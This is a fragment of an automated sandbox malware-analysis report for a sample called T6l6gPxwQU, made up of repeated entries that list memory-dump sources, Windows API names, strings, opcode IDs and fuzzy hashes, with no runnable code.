                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: cbf4455db4f79cbc97e4796fad02e370887e96f061bef8efad8b27a244a452e9
                                                                        • Instruction ID: 03a86c1b420c890c12b03b2fa0c7ed8c02ebf5bd87146e520802d35b0f135c8d
                                                                        • Opcode Fuzzy Hash: cbf4455db4f79cbc97e4796fad02e370887e96f061bef8efad8b27a244a452e9
                                                                        • Instruction Fuzzy Hash: FC314D37B04A0186FB58DF2AD4507B927A1FB88B9CF244435DF1D87BA8DE79E4458B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                        • Instruction ID: 141b6608a1a9d4f063a0540c80de52b5fbdacdb29290cae4c3a76809edab0f08
                                                                        • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                        • Instruction Fuzzy Hash: C5116072B0878182EB10DF2AE08436C7760FB88BA8F058631DB6D877A5CF7CD5558740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: 0610f22d45407fd0b47a7a649e0349a2c0dbbad51231877a54e137cb0a8b0597
                                                                        • Instruction ID: 466c500d8294cfcdfb38770efcf6ffb4555d1220a2d284ab6f430109ea3accd4
                                                                        • Opcode Fuzzy Hash: 0610f22d45407fd0b47a7a649e0349a2c0dbbad51231877a54e137cb0a8b0597
                                                                        • Instruction Fuzzy Hash: 08F0C872A1864241E7205B59F40436AA6A5FFCD798F104134EB9D83BB9DF3CD0048B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 81990902-0
                                                                        • Opcode ID: 49a98fc6521228d41d6ee00f4cae757a9dad9a29f92d95664a2eb1366841800e
                                                                        • Instruction ID: f2a7130974189ff3ba8543713f0dd2c61c7f27ba77f7c375803154d5942281eb
                                                                        • Opcode Fuzzy Hash: 49a98fc6521228d41d6ee00f4cae757a9dad9a29f92d95664a2eb1366841800e
                                                                        • Instruction Fuzzy Hash: 49F06576A14A4582EB54DB65E4153B95360FFDCF9CF240532CF0D87664CF7CD0868640
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: a/p$am/pm
                                                                        • API String ID: 0-3206640213
                                                                        • Opcode ID: abba1fb59dd0d37a808e969f9d786e5f26a4ac26cb0ba132a4672942b94724d8
                                                                        • Instruction ID: 93bf818c6f5acb614e8e4d2e566f2ebbae57f634664ac0f0dd5f42fe92b42c07
                                                                        • Opcode Fuzzy Hash: abba1fb59dd0d37a808e969f9d786e5f26a4ac26cb0ba132a4672942b94724d8
                                                                        • Instruction Fuzzy Hash: CCE1E622A1865286EB648F2CC1546BD23A5FF497C8F548132EB1EC76E4DF3DE950C31A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Variable is not of type 'Object'.
                                                                        • API String ID: 0-1840281001
                                                                        • Opcode ID: 903f54f37762a1b1603f630ddb035c24824f1b40b9e0622cad9e3e6b46b0f31d
                                                                        • Instruction ID: e7fa3921d60be3e21fb4fed7aa394a099ca2c96ed8e81abac89a00a2a826c17b
                                                                        • Opcode Fuzzy Hash: 903f54f37762a1b1603f630ddb035c24824f1b40b9e0622cad9e3e6b46b0f31d
                                                                        • Instruction Fuzzy Hash: 3F526D72A08642AAFB20DF69C0902FD23A1FB4978CF508135DF0D97AA9EF79E555C350
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: no error
                                                                        • API String ID: 0-1106124726
                                                                        • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                        • Instruction ID: ce85e9f8df8cb06cc3378e8da896e50c8273059c2471196f5194e9b6b1741c20
                                                                        • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                        • Instruction Fuzzy Hash: 82126B72A187919AE724CF69E8402AD37A4FB4874CF144536EF4E97BA4EF38E950C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID:
                                                                        • API String ID: 481472006-0
                                                                        • Opcode ID: e36dc1ad2879a5259b2600d331359bca7c9e103ed6834be3ce7b4b079d39d0f7
                                                                        • Instruction ID: 22755c40e1c559a854f9f6abedff3c8a72a6b2b5fd40ecc533f21bd8f622656c
                                                                        • Opcode Fuzzy Hash: e36dc1ad2879a5259b2600d331359bca7c9e103ed6834be3ce7b4b079d39d0f7
                                                                        • Instruction Fuzzy Hash: BE41BE62F5578290EA04EF26D4400FD63B0FF59B88B459836DF1E937A6EE38E115C714
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: InputSend
                                                                        • String ID:
                                                                        • API String ID: 3431551938-0
                                                                        • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                        • Instruction ID: 8ce4f2a537d0714cdfc45030439a22b2adf387e45aa0d692af88e6da79d899a5
                                                                        • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                                        • Instruction Fuzzy Hash: DBF0BE6691C6D0C6D3208F19E44076A77A0F75878DF406219EB8987B64CF3EC10A8F04
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: mouse_event
                                                                        • String ID:
                                                                        • API String ID: 2434400541-0
                                                                        • Opcode ID: 0b714c751875e8dc45ae7a8dcacc26d290f00faff47a66fe6fea29bbb9c03c96
                                                                        • Instruction ID: e6a46c08d7d09546c4b128439432ff5d7d3596255e40ca62eaeb356baf3abca3
                                                                        • Opcode Fuzzy Hash: 0b714c751875e8dc45ae7a8dcacc26d290f00faff47a66fe6fea29bbb9c03c96
                                                                        • Instruction Fuzzy Hash: A0E01A6BE181C2D2F2695A3C952AB751652BBA930CE940230C78986AF6CD1DA6079601
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                        • Instruction ID: 201148aec4693152dc2e54da20f58b879293d2a7a638b95ae2244dad57b1f4ef
                                                                        • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                        • Instruction Fuzzy Hash: B0E065327142028AEB549B79E0842796290BB8CB88F145435DB0DC73A5DE7CD4908700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                        • Instruction ID: b812ec2fe6978d55b8e71d6e6536fd649acc9408e6116331c23c5e05a69c7526
                                                                        • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                        • Instruction Fuzzy Hash: 39C00271614662D9E760DF68D8D45DC3331F71475DF905121E70A5E5B89F789648C340
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: 0
                                                                        • API String ID: 3215553584-4108050209
                                                                        • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                        • Instruction ID: 1b649d4e05c2fa38572ba4f757ba1a51e38d8b18af4066c0003057b3397b6ab0
                                                                        • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                        • Instruction Fuzzy Hash: CB81C722A1C60286EAA48A6D904097E23A0FF5DB4CF541531DF0ED76B5CFEDE946DF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: 0
                                                                        • API String ID: 3215553584-4108050209
                                                                        • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                        • Instruction ID: c9baa2e130393f11743d85108e328ab006cb631517da12fabe00d56377f1e434
                                                                        • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                        • Instruction Fuzzy Hash: 5271B225A1C68246FB688B2D904027E77A1BF49B4CF249535DF0DC76FACE6DE8468F01
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e208b31f6d37cdc72f3bd69f02d4d9af6c04350764ab3d2777e2d74da59ea266
                                                                        • Instruction ID: 5d0e34ab6c3b4d5d4aedfb462286957c1385408df2fd9ec977e9613ba7e66952
                                                                        • Opcode Fuzzy Hash: e208b31f6d37cdc72f3bd69f02d4d9af6c04350764ab3d2777e2d74da59ea266
                                                                        • Instruction Fuzzy Hash: 74528E32A0C68296EA34DB29D49867D23A5FF0DB8CF194536DB5E876A5EF3CE450C340
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID:
                                                                        • API String ID: 118556049-0
                                                                        • Opcode ID: efb145b0ed894b1b8c0109129c514bbf930bbb5e7afbde99f9239a59bcee5cb2
                                                                        • Instruction ID: 83702990e309532783f0713c09419953c47d04f232a046f8324f801ce0bd95df
                                                                        • Opcode Fuzzy Hash: efb145b0ed894b1b8c0109129c514bbf930bbb5e7afbde99f9239a59bcee5cb2
                                                                        • Instruction Fuzzy Hash: D3524C72B09A428AEB10DF69D4542BD23A1FB49B9CF508235DF1EA77E9DE38E405C740
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98d026a1c203ba6ed6fe6f35b32a31a9f72c9afe610f9e181af674b5eb536a0a
                                                                        • Instruction ID: 3819b431a7526ebe22c65998bd18a89ee96d52bbca6f2ad5fae2d4ab68a9ab84
                                                                        • Opcode Fuzzy Hash: 98d026a1c203ba6ed6fe6f35b32a31a9f72c9afe610f9e181af674b5eb536a0a
                                                                        • Instruction Fuzzy Hash: 6F428B32B0878286EB10DB29D4802AD7BA5FB8979CF604135DF5E97BA5DF39E541C700
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                        • Instruction ID: 692858f92f46e228f965c34bf817d864e1971da72e907dee0728a4f1725ab498
                                                                        • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                        • Instruction Fuzzy Hash: FF421E21D69E5A89E6538B3DB45153A6764BF5A3C8F01C337EB0FE7670EF2CA4428604
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                        • Instruction ID: 39da2e5a38aadafdd1f09d2d5edab32516ff587fb6f7fef3403565b4be0a7734
                                                                        • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                        • Instruction Fuzzy Hash: 93711732E0C29286F7648A2D94907BD6291BF4A378F144638EB5FC76F5EE7DE8418710
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
